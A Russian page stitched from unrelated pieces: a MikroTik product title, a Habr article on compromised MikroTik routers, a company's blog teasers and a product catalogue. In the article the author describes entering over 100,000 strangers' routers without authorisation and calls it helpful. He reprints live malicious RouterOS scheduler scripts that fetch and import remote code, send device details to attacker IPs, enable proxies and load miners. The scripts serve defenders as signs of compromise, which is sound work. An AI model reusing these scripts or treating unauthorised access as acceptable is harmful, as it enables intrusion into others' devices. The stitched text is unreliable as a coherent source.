Микротик роутер борт: обзор, характеристики, цена. Микротик RB3011UiAS-RM купить у официального дистрибьютора

Для чего хакерам Микротик и как я спрятал 100 тыс. RouterOS от ботнета / Хабр

RouterOS очень мощный инструмент в руках профессионалов и ответственных специалистов. Но в руках новичков или тех, кто делает всё на «и так сойдёт» Mikrotik начинает жить своей жизнью и превращается в ноду ботнета.

Ещё в мае 2018 я писал статью с рекомендациями как защитить свой Микротик.

Как ни странно, но в сети до сих пор тысячи «открытых» роутеров Mikrotik и армия ботнета пополняется.

Я в свободное от работы и отдыха время искал уязвимые устройства по всей сети и делал настройки в соответствии со своими рекомендациями, то есть добавлял правила фаервола, которые закрывали доступ к роутеру не из локальной сети. В комментариях писал информацию об уязвимости и оставлял адрес телеграм-канала @router_os, где можно было мне задать интересующие вопросы (у нормального админа они должны были появиться).

С мая по сегодняшний день я «вырвал» из лап ботнета более 100 тысяч устройств Mikrotik.

Учитывая то, что я не могу выступить на MUM 2018 в Москве, то свой доклад я решил опубликовать на habr.com


В сети много аналитики как именно используются RouterOS хакерами (например здесь). Но моя статья основана лично на моём опыте.

Админы и их реакция


По всему миру админы маршрутизаторов рано или поздно обнаруживали у себя такую пасхалку.

/system note

/system note print

show-at-login: yes

note: I closed the vulnerability with a firewall. Please update RouterOS. You can say thanks on the WebMoney Z399578297824 or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1. My Telegram http://t.me/router_os


Большинство тихо закрывало дыру. Кто-то не поленились мне написать «спасибо». Но были и те, кто громко негодовал не разобравшись.

Нормальный специалист должен адекватно реагировать когда ему указывают на его ошибку.


За всё время мне написало не более 50 человек…

Так как реакция пользователей была минимальна, то я пришёл к выводу, что подавляющее большинство даже и не заметит, что что-то на роутере не так. Поэтому я стал дорабатывать свой скрипт, который помимо правил фаервола будет удалять известные мне backdoors, которые оставили злоумышленники.

Логично, что мой метод устраивает не всех. Но другого подхода для выполнения данной задачи я не придумал ещё.

Хакеры любят RouterOS


В подавляющем большинстве случаев я попадал на устройство, которое уже кем-то заражено. Я, к сожалению, не сразу стал анализировать их содержимое. Вот что я нашёл и что будет верным признаком, что ваш роутер скомпрометирован.

Web-прокси и Socks


Самое банальное использование маршрутизатора через стандартные вэб и socks прокси. Если вы их не используете, но они включены, то просто выключите их.

/ip proxy set enabled=no

/ip socks set enabled=no


Но чтобы просто так не получилось выключить хакер добавляет в шедулер скрипт, которой прокси включит через некоторое время:

/system script

/system scheduler

add interval=10m name="port 54321" on-event="port 54321" policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \

start-date=sep/02/2018 start-time=20:35:53

/system script

add name="port 54321" owner=gateway policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/\

ip firewall filter remove [/ip firewall filter find where comment ~ \"port\

\_[0-9]*\"];/ip socks set enabled=yes port=54321 max-connections=255 conne\

ction-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip \

firewall filter add chain=input protocol=tcp port=54321 action=accept comm\

ent=\"port 54321\";/ip firewall filter move [/ip firewall filter find comm\

ent=\"port 54321\"] 1;"


Вы можете обнаружить у себя файл webproxy/error. html который прокси вам подсовывает, а он в свою очередь вызывает майнер.

Лишние параметры появляются и здесь:

/ip proxy access print

/ip socks access print

Script может всё


В 90% дырявых Микротиков имеются скрипты /system script и для них настроено расписание выполнения /system scheduler.

По расписанию скачивается скрипт, которой в дальнейшем выполняется.

Установка майнера

/system scheduler

add interval=11h name=upd113 on-event="/tool fetch url=http://gotan.bit:31415/\

01/error.html mode=http dst-path=webproxy/error.html" policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\

aug/20/2018 start-time=03:28:02

add interval=9h name=upd115 on-event=\

"/tool fetch url=http://gotan.bit:31415/01/u113. rsc mode=http" policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\

aug/20/2018 start-time=03:28:02

add interval=9h name=upd116 on-event="/import u113.rsc" policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\

aug/20/2018 start-time=03:28:12

add interval=1d name=Auto113 on-event="/system reboot" policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\

aug/20/2018 start-time=03:00:00

/system script

add name=script4_ owner=nivel2 policy=\

ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\

ddress=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http keep-resu\

lt=no"

Ещё один вариант скрипта, который после применения пытается частично спрятаться.

/system scheduler

add interval=11s name=MTIT on-event="/system script run MTIT" policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\

startup

add interval=25m name="DDNS Serv" on-event="/system script run iDDNS" policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\

startup

/system script

add name=MTIT owner=admin policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive source=\

"/ping 10. 12.0.26 interface=ether4 count=10"

add name=iDDNS owner=admin policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":global\

\_mac [/interface ethernet get 1 mac-address]\r\

\n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\

\"_\".[/ip proxy get port])\r\

\n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled].\"_\

\".[/interface pptp-server server get enabled])\r\

\n:global cmd \"/\$mac/\$port/\$info/dns\"\r\

\n/tool fetch address=91.134.24.238 src-path=\$cmd mode=http dst-path=dns;\

:delay 3s\r\

\n/import dns;:delay 4s;/file remove dns"


Таким образом у злоумышленников всегда есть возможность «скормить» новый скрипт и, например, провести масштабную DDOS атаку.

Скрипты могут быть спрятаны везде

Поэтому проверяйте эти места тщательно. На чистом RouterOS эти места пустые.

DST-NAT


К моему большому удивлению, но много таких устройств, на которых завёрнут трафик через /ip firewall nat.

Спам в dst-nat

/ip firewall nat

add action=masquerade chain=srcnat comment="default configuration"

add action=masquerade chain=srcnat

add action=dst-nat chain=dstnat dst-port=4444 protocol=tcp to-addresses=\

91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-port=8008 protocol=tcp to-addresses=\

91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=218.11.2.83 dst-port=8008 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=218.11.2.83 dst-port=443 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=218. 11.2.83 dst-port=25 protocol=\

tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=51.15.39.52 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=51.15.39.186 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=51.15.89.69 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=79.137.82.70 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=79.137.82.104 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=92.222.72.197 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=92. 222.180.118 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=151.80.59.84 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444


Хороший способ скрыть свой реальный ip.

VPN


Как же без него. RouterOS умеет подымать различные виды vpn, но хакеры чаще всего используют pptp и L2TP.

Поэтому проверьте раздел /ppp secret

Даже если этот раздел пуст, то ушлые хакеры могут авторизоваться и через Radius.

Проверяем наличие записей /radius print

Если вы ничего не настраивали, то там должно быть пусто. В противном случае стоит очистить:
/radius remove numbers=[/radius find ]

И запретить использовать Radius
/ppp aaa set use-radius=no use-circuit-id-in-nas-port-id=no

Отключаем использование Radius для авторизации на устройстве
/user aaa set use-radius=no

Если вы не используйте vpn, то отключите его
/interface l2tp-server server set enabled=no

/interface pptp-server server set enabled=no

/interface sstp-server server set enabled=no

DNS static


Без фишига так же не обошлось. На роутерах в /ip dns static можно обнаружить и такое

Всё очень просто: вы в адресную строку вбиваете адрес сайта, который вы знаете, а фактически попадаете на сервер злоумышлинника.

Удаляем содержимое

/ip dns static remove numbers=[/ip dns static find]

Урезание прав админа

UPD: Так же есть группа роутеров, где хакер урезал права у admin и завёл своего с полными правами (например router и cnt), либо просто отбирает права и обновляет прошивку на последнюю.

содержимое /user в первом случае

[router@MikroTik] > /user print

Flags: X — disabled

# NAME GROUP ADDRESS LAST-LOGGED-IN

0 ;;; system default user

admin admin sep/18/2018 15:08:45

1 dima full sep/14/2018 19:54:00

2 router full sep/26/2018 09:23:41

[router@MikroTik] > /user group print

0 name=«read» policy=local,telnet,ssh,reboot,read,test,winbox,password,web,sniff,sensitive,api,romon,tikapp,!ftp,!write,!policy,!dude skin=default

1 name=«write» policy=local,telnet,ssh,reboot,read,write,test,winbox,password,web,sniff,sensitive,api,romon,tikapp,!ftp,!policy,!dude skin=default

2 name=«full» policy=local,telnet,ssh,ftp,reboot,read,write,policy,test,winbox,password,web,sniff,sensitive,api,romon,dude,tikapp skin=default

3 name=«admin» policy=local,ftp,reboot,read,write,test,winbox,password,web,sniff,sensitive,api,!telnet,!ssh,!policy,!romon,!dude,!tikapp skin=default

Как вариант решения этой проблемы: через netinstall сделать downgrade на уязвимую прошивку и воспользоваться эксплоитом.

Packet Sniffer


Коллеги из Лаборатории Касперского упомянули кражу трафика по средствам его перенаправления на неизвестный узел.

Выключить его можно так:
/tool sniffer stop

/tool sniffer set streaming-enabled=no filter-ip-protocol="" filter-port="" filter-interface="" filter-stream=no

Проблема продукции Mikrotik


Абсолютно защищённых систем не существует. А массовое распространение продукции Mikrotik так же повлекло массовое изучение этих устройств.

Так как функционал RouterOS позволяет выполнять огромное количество задач он интересен и хакерам в том числе.

Из-за того, что продукт очень динамично развивается, то и скорость появления новых «дыр» тоже велико. Не смотря на это компания Микротик оперативно выпускает заплатки для своих систем.

Выход


На сегодняшний день единственным верным решением для защиты RouterOS — это корректно настроенный фаервол, который работает по принципу «запрещено всё, что явно не разрешено».

А всё потому, что Микротик использует классический фаервол Linux, который годами оттачивался армией специалистов.

Если требуется доступ к устройству из глобальной сети, то используйте принцип «port knocking». Принцип «fail2ban» себя не всегда оправдывает, так как всё равно обнаруживает устройство.

Глобальные решения

Режим ламера


В виду того, что устройства очень дешёвые, то их покупают пользователи, которые не имеют специальных знаний. Компании Mikrotik необходимо разработать интерфейс «ламера», который имеет минимальное количество настроек как и большинство SOHO роутеров. Причём он должен быть по умолчанию. А расширенный режим пользователь должен включить осознано сам. Текущий «Quick set» не достаточно хорош. Более того из-за изобилия кнопок юзер может и не заметить эту функцию.

Bug analyzer


Так же необходим модуль, который проводит анализ текущей конфигурации на возможные уязвимости и уведомляет пользователя, если считает, что роутер может быть скомпрометирован. Этот модуль должен подгружать «базу знаний», которую наполняют сотрудники Mikrotik на основании распространённых ошибок. А в случае серьёзных уязвимостей включать «аварийный» режим.

Если я смог систематизировать часть угроз, то разработчики и подавно…

FireWall — как услуга провайдеров


Рынок «умных» устройств очень бурно развиваются и они далеко не все хорошо защищены. Большинство людей, которые их приобретают, так же не владеют специальными знаниями, чтобы самостоятельно защитить свои гаджеты.

Поэтому интернет провайдерам пора создать коммерческую услугу по защите таких гаджетов. Банально пользователь в личном кабинете указывает какие порты открыть из интернета.

Так же провайдеры могут создать централизованную базу по существующим устройствам и их нормальным потребностям. Пользователь указывает в ЛК какие устройства у него используются. В случае нестандартного поведения такого устройства — уведомлять пользователя.

Я считаю, что рынок уже созрел для такой услуги.

В этой услуге есть следующие плюсы:

  1. Для провайдера ещё одна статья дохода
  2. Сокращение паразитного трафика
  3. Сокращаем рекрутинг устройств в ботнет
  4. Популяризация развивающихся услуг «умный дом»
  5. Пользователи могут дальше не заморачиваться своей безопасностью.

Немного о себе


Попытаюсь ответить на вопросы, которые наверняка мне зададут.

  1. Я работаю на должности не связанной с Mikrotik и сетями в общем.
  2. Тем не менее у меня есть сертификат MTCNA.
  3. Микротик — моё хобби. Всё, что я делаю — мне просто нравится. Так сказать «по фану».
  4. Почему не устроился на работу по профилю? Те кто в нашем городе покупает mikrotik много платить ЗП не могут. Те, кто может мне платить достойную ЗП — покупают cisco.
  5. В комментах в фаерволе я указывал свои кошельки, но с мая мне закинули всего около $40. В телеграм писали из разных стран, мол у них нет wmz, но всё равно «спасибо».

P.S.:


Поделитесь вашим опытом как ещё хакеры могут использовать Mikrotik.

Mikrotik — Цифровые Системы г. Сочи

  • Инструкции
  • 11.10.2022

Mikrotik Dual WAN Главная Выше представлена схема коммутации Dual WAN на маршрутизаторе Mikrotik. В данной статье рассмотрим самый простой вариант проверки наличия связи на двух аплинках с переключением на резервный, в случае проблем на основном. Важно заметить В данном примере мы не рассматриваем такие интересные моменты, связанные с работой нескольких аплинков, как: PPPoE/DHCP/L2TP аплинки с […]

Читать далее

  • Wi-Fi, Проекты
  • 31.07.2022

Проект 2017 года – 5 лет спустя Главная Позвали второй раз за 5 лет починить оборудование, так-как зашел “Мегафон”, попытался сбросить protected-routerboot – получил “кирпич” в перманентной перезагрузке и отрезанные Unifi точки доступа от контроллера после замены Mikrotik на брэндовый маршрутизатор.  ЗаNetinstall’или на борт ROS 6.39.2 версию посвежее 7.4, зацепили снова Unifi APs, обновили – работает. […]

Читать далее

  • Оборудование
  • 29.07.2022

Производительность Mikrotik CCR1009-7G-1C-1S+ Главная Перфоманс от CCR1009-7G-1C-1S+. Красиво балансирует по ядрам, но уже уперся и просит замену на 1036. Ниже “чего делает” NAS (шейпер): /ip firewall filter print count-only22/queue simple print count-only442/ip firewall nat print count-only12 NAT символичный для странички блокировки. Записи про оборудование

Читать далее

  • Wi-Fi
  • 30.04.2021

hAP ac2 Wifi speedtest Главная Mikrotik hAP ac2 Пример пропускной способности Wifi 5ГГц в относительно идеальных условиях на оборудовании Mikrotik. Тестирование проводили с помощью MacBook Pro с картой 5ГГц и поддержкой стандарта ac. Расстояние между точкой и ноутбуком порядка 2м, прямая видимость. Тестирование проводилось утилитой Speedtest до сервера ISP (локальная гигабитная сеть). По профилю подключение […]

Читать далее

  • Оборудование
  • 05. 04.2021

Mikrotik CCR1036-8G-2S+ BGP x2 full view Главная Mikrotik CCR1036-8G-2S+ BGP На маршрутизаторе подключено 2 аплинка с full view, 3-я сессия надзорных органов. Ниже показатели загрузки процессора, оперативной памяти, трафик на 10G интерфейсе (схема включения Router on a stick), PPS. PPS CPU Traffic Memory 100% CPU на одном ядре Обратите внимание на неприятную особенность однопоточной обработки […]

Читать далее

  • Оборудование
  • 24.03.2021

Mikrotik CCR1009-7G-1C-1S+ BGP x2 full view Главная Mikrotik CCR1009-7G-1C-1S+ BGP На маршрутизаторе подключено 2 аплинка с full view, 3-я сессия надзорных органов. Ниже показатели загрузки процессора, оперативной памяти, трафик на 10G интерфейсе (схема включения Router on a stick), PPS. 7 дней 2 дня 1 день 100% CPU на одном ядре Обратите внимание на неприятную особенность […]

Читать далее

  • VPN
  • 22.03.2021

IPsec IKE2 между Mikrotik hAP ac2 и RB4011 Главная Схема подключения Два маршрутизатора подключены к гигабитной локальной сети одного ISP (Internet Service Provider). Утилитой Speedtest получили стабильные 300 Мбит/с TCP трафика, и 500 Мбит/с UDP IPsec IKE2 На объекте заказчика установлен гипервизор VMWare ESXi, для снятия резервной копии рабочих VM (Virtual Machine) мы настроили туннельное […]

Читать далее

  • Новости
  • 10.12.2020

MTCIPv6E 2020 Главная Тренинг MikroTik MTCIPv6E в Сочи Тренинг 2-го уровня MTCIPv6E (MikroTik Certified IPv6 Engineer) предназначен для сетевых и системных инженеров, а также для всех ИТ-специалистов, желающих повысить свой уровень знаний о протоколе IPv6 и его применении. Курс успешно пройден По итогам курса был успешно сдан экзамен в формате теста. Результат тестирования 85% (порог […]

Читать далее

  • Оборудование
  • 10.04.2020

Mikrotik hEX RB750Gr3 Главная Аппаратные характеристики Релиз маршрутизатора Mikrotik hEX состоялся в ноябре 2016 г. Назад Далее Процессор 880 МГц, 2 ядра, 4 потока 256 Мб оперативной памяти RAM 5 Gigabit Ethernet  портов RJ-45 Полноразмерный USB для подключения 3/4G модемов MicroSD слот для карт памяти Поддержка сервера мониторинга The Dude IPsec аппаратное шифрование со скоростью […]

Читать далее

  • Оборудование
  • 20. 03.2020

Mikrotik Главная О компании Латвийская компания, основанная в 1996 году, основным направлением которой было предоставление беспроводного доступа к сети Internet (Wireless Internet Service Provider). Начиная с 2002 года Mikrotik производит программно-аппаратное обеспечение под собственным брэндом. Основное направление производства – маршрутизаторы и беспроводные точки доступа. Сегодня ассортимент производства составляет порядка 166 моделей оборудования, которое можно встретить дома, в […]

Читать далее

Маршрутизаторы и беспроводные устройства MikroTik — продукты

 

Версия 6-го поколения легендарного hAP ac². С PoE-входом и PoE-выходом, гораздо более быстрой беспроводной связью, большим объемом оперативной памяти и современным процессором. Самый маленький полноценный маршрутизатор AX на рынке!

Наша первоклассная домашняя точка доступа AX. Со всей вычислительной мощностью и скоростью
вашему домашнему хозяйству может когда-либо понадобиться.
Беспроводная связь Gen 6, 2,5 Gigabit Ethernet, PoE, WPA3 и многое другое!

Домашняя точка доступа, сертифицированная оператором связи США, с поддержкой LTE6 на скорости до 300 Мбит/с. Благодаря 5 портам Gigabit Ethernet, мощному четырехъядерному процессору и освежающе элегантному дизайну это устройство является правильным выбором для большинства домов.

Лучшая домашняя точка доступа стала еще лучше. Версия Chateau LTE18 поколения 6. Гораздо более быстрая беспроводная связь, улучшенный процессор, а теперь и 2,5-гигабитный Ethernet!

Мобильный интернет никогда не был быстрее! Версия Chateau 5G поколения 6. Гораздо более быстрая беспроводная связь, улучшенный процессор, а теперь и 2,5-гигабитный Ethernet!

Миниатюрная домашняя точка доступа 2,4 ГГц с тремя портами LAN

Недорогая домашняя беспроводная точка доступа с двойной беспроводной сетью 2,4 ГГц, питание от USB

Небольшая домашняя точка доступа с четырьмя портами Ethernet и красочным корпусом.

Недорогая двухканальная точка доступа 2,4 ГГц с настенным и потолочным корпусом

Миниатюрная точка доступа Dual Chain 2,4 ГГц с ЦП 650 МГц, ОЗУ 64 МБ и одним портом Ethernet

Микро-точка доступа Dual-Chain 2,4 ГГц, ЦП 650 МГц, 64 МБ ОЗУ, 2 порта Ethernet, выход PoE

Точка доступа 2,4 ГГц, пять портов Ethernet, выход PoE на порту 5, USB для поддержки 3G/4G

Маленькая защищенная от непогоды точка беспроводного доступа для монтажа на потолке, стене или столбе

Небольшая защищенная от непогоды беспроводная точка доступа точка доступа для монтажа на потолке, стене или столбе. В черном

Потолочная точка доступа, Dual-Chain 2,4 ГГц, ЦП 650 МГц, RouterOS L4, поддержка 802.3at/af Поддержка 4G

Двойная одновременная точка доступа 2,4/5 ГГц, 802.11ac, пять портов Ethernet, выход PoE на порту 5, USB для поддержки 3G/4G, универсальный корпус Tower с тремя портами Ethernet и сквозным телефонным разъемом для гостиничных сетей

Точка доступа 2,4 ГГц с пятью портами Ethernet и выходом PoE на порту 5. Она оснащена процессором с частотой 600 МГц, 128 МБ ОЗУ и портом USB.

Двухконкурентная точка доступа 2,4/5 ГГц, 802.11a/b/g/n/ac, пять портов Gigabit Ethernet, USB для поддержки 3G/4G, универсальный корпус Tower и поддержка аппаратного шифрования IPsec

2,4 ГГц точка доступа,
5xGigabit Ethernet, USB,
ЦП 600 МГц, ОЗУ 128 МБ

Двухдиапазонная беспроводная точка доступа 2,4/5 ГГц для монтажа на потолке или стене с двумя портами Gigabit Ethernet (один с выходом PoE), поддержкой 802. 11ac и поддержкой аппаратного шифрования IPsec

Небольшая защищенная от непогоды точка беспроводного доступа с антеннами LTE и разъемом miniPCI-e

wAP ac — небольшая двухдиапазонная защищенная от непогоды беспроводная точка доступа для установки на столб, стену или потолок. Новая версия имеет 2 порта Gigabit Ethernet, улучшенную производительность беспроводной антенны, больше оперативной памяти и мощный четырехъядерный процессор!

wAP ac — небольшая двухдиапазонная защищенная от непогоды беспроводная точка доступа для монтажа на столбе, стене или потолке. Новая версия имеет 2 порта Gigabit Ethernet, улучшенную производительность беспроводной антенны, больше оперативной памяти и мощный четырехъядерный процессор!

Шлюз IoT для самых универсальных и экономичных установок

Потолочная точка доступа на стероидах! Наш бестселлер cAP вернулся — бодрее и сильнее, чем когда-либо. По сравнению с предыдущими моделями cAP улучшенная антенна с высоким коэффициентом усиления увеличивает зону охвата до 100%!

Беспроводной двухдиапазонный маршрутизатор с 5 портами Gigabit Ethernet и внешними антеннами с высоким коэффициентом усиления для большего покрытия

Точка доступа 2,4 ГГц, 5x Ethernet, 5x Gigabit Ethernet, каркас SFP, USB, ЖК-дисплей, выход PoE на Eth20, ЦП 600 МГц, 128 МБ ОЗУ

Две одновременные точки доступа с тройной цепью 2,4/5 ГГц, 802.11ac/a/n/b/g, пять портов Gigabit Ethernet, выход PoE на порт 5, SFP, USB для поддержки или хранения 3G/4G

Трехдиапазонный ( одна домашняя точка доступа 2,4 ГГц и две 5 ГГц) с технологией ячеистой сети

Беспроводной двухдиапазонный маршрутизатор с поддержкой LTE и портами 5 Gigabit Ethernet.
Правильный выбор для большинства домов!

Один маршрутизатор, который порадует всех — представляем идеальную домашнюю точку доступа с поддержкой LTE

Мощный маршрутизатор с портами 10xGigabit, четырехъядерным процессором 1,4 ГГц, 1 ГБ ОЗУ, SFP+ 10 Гбит/с, двухдиапазонный 2,4 ГГц / 5 ГГц, 4×4 MIMO 802.11a/ b/g/n/ac беспроводной и настольный корпус

Трехдиапазонная (одна 2,4 ГГц и две 5 ГГц) домашняя точка доступа с поддержкой LTE CAT6 и технологией ячеистой сети

Один маршрутизатор, который порадует всех — представляем лучшую домашнюю точку доступа с поддержкой сверхбыстрых сетей LTE/5G

Маршрутизаторы MikroTik и беспроводная связь — продукты

 

Компактная и доступная по цене PoE-станция с 8 выходными портами Gigabit PoE и двумя портами 10 Gigabit SFP+.

Оптимальный выбор для 10-гигабитных сетей вне помещений. Высокие мачты, столбы или башни — ваше соединение будет безопасным! Мощная бюджетная версия netFiber 9.

100-гигабитный коммутатор для корпоративных сетей и центров обработки данных.
Компоненты с возможностью «горячей» замены и безумная плотность портов с коммутацией 1,2 Тбит/с
вместимость!

Интеллектуальный коммутатор 5x Gigabit Ethernet,
клетка СФП,
пластиковый корпус,
SwOS

5x Gigabit PoE out Ethernet Smart Switch,
клетка СФП,
пластиковый корпус,
Интеллектуальный коммутатор SwOS

, 5 отсеков SFP, 1 комбинированный порт (SFP или Gigabit Ethernet), ЦП 400 МГц, ОЗУ 128 МБ, настольный корпус, RouterOS L5

Восемь портов 1G Ethernet и два порта SFP+ для подключения по оптоволокну 10G.
Портативный, мощный и чрезвычайно экономичный — этот коммутатор мгновенно стал классикой!

Коммутатор PoE для наружной установки с гигабитным Ethernet и портами 10G SFP+.

8x Gigabit Smart Switch, 1x SFP-корзина, ЖК-дисплей, двухканальная беспроводная связь 802.11b/g/n, ЦП 600 МГц, 128 МБ ОЗУ, металлический корпус для настольных ПК, RouterOS L5, поддержка 10–57 В.

Пятипортовый настольный коммутатор с одним портом Gigabit Ethernet и четырьмя портами SFP+ 10 Гбит/с

Внешний 18-портовый коммутатор с 15 обратными портами PoE и SFP. Сокращайте расходы, а не скорость — выбирайте GPEN, а не GPON!

8x Gigabit Ethernet Smart Switch, 4x SFP-корзины, ЦП 400 МГц, 128 МБ ОЗУ, настольный корпус, RouterOS L5

24-портовый коммутатор Gigabit Ethernet с питанием от SwOS и двумя портами SFP+ в стоечном корпусе высотой 1U

24 порта Gigabit, 2 каркаса SFP+ и настольный корпус — мощность серверной комнаты для вашего дома!

10-гигабитное оптоволоконное соединение на расстоянии более 100 метров — для небольших офисов или интернет-провайдеров. Аппаратная разгрузка VLAN-фильтрации и даже некоторая маршрутизация L3 при ограниченном бюджете!

24-гигабитный коммутатор с 2 отсеками SFP+ в корпусе для монтажа в стойку 1U, двойная загрузка (RouterOS или SwitchOS)

8x Gigabit Ethernet Smart Switch с выходом PoE, 4 отсека SFP, ЦП 400 МГц, ОЗУ 128 МБ, настольный корпус, RouterOS L5

Интеллектуальный коммутатор 24x Gigabit Ethernet уровня 3,
1x SFP-корзина, ЖК-дисплей, двухканальная беспроводная связь 802.11b/g/n,
Процессор 600 МГц, ОЗУ 128 МБ,
Металлический настольный корпус, RouterOS L5

Замечательный уличный коммутатор для настройки оптической сети 10G, который может
даже выполнить легкую маршрутизацию.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *